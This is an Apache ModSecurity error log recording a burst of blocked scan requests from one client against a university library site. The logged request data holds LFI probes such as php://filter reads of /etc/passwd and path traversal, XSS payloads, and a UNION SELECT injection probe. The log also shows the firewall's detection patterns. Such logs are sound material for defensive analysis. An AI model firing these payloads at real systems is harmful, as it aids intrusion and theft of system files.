[Tue Aug 29 11:53:18.721440 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAoXJvoAAAAP"]
[Tue Aug 29 11:53:19.853083 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAog@EEAAAAY"]
[Tue Aug 29 11:53:19.955378 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAofm6kAAAAX"]
[Tue Aug 29 11:53:20.690939 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAoesNYAAAAV"]
[Tue Aug 29 11:53:21.627218 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAoAkzIAAAAC"]
[Tue Aug 29 11:53:22.545729 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAog@EkAAAAY"]
[Tue Aug 29 11:53:22.547153 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wsCo-f0AAAox7GIAAAAN"]
[Tue Aug 29 11:53:23.387356 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAosCxUAAAAm"]
[Tue Aug 29 11:53:24.092652 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoyGyoAAAAI"]
[Tue Aug 29 11:53:24.645232 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAoz71IAAAAS"]
[Tue Aug 29 11:53:24.770948 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAofm7UAAAAX"]
[Tue Aug 29 11:53:25.692710 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAni-EEAAAAU"]
[Tue Aug 29 11:53:25.815068 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xcCo-f0AAAo0gNoAAAAZ"]
[Tue Aug 29 11:53:27.206697 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoXJxUAAAAP"]
[Tue Aug 29 11:53:27.568610 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAor7sYAAAAk"]
[Tue Aug 29 11:53:27.892822 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAfWOXgAAAAL"]
[Tue Aug 29 11:53:28.112277 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAoz718AAAAS"]
[Tue Aug 29 11:53:28.827274 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAoAk0IAAAAC"]
[Tue Aug 29 11:53:28.933751 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAog@GMAAAAY"]
[Tue Aug 29 11:53:29.383936 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAfWOXwAAAAL"]
[Tue Aug 29 11:53:30.597700 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAo2m3wAAAAA"]
[Tue Aug 29 11:53:31.233198 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAox7HsAAAAN"]
[Tue Aug 29 11:53:33.976444 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zcCo-f0AAAn407YAAAAW"]
[Tue Aug 29 11:53:34.139270 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zsCo-f0AAAox7IMAAAAN"]
[Tue Aug 29 11:53:35.910486 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAn4078AAAAW"]
[Tue Aug 29 11:53:37.322876 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAolKYQAAAAe"]
[Tue Aug 29 11:53:39.078293 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAoyG0kAAAAI"]
[Tue Aug 29 11:53:41.932826 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAApIdikAAAAU"]
[Tue Aug 29 11:53:42.660146 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAoGFecAAAAE"]
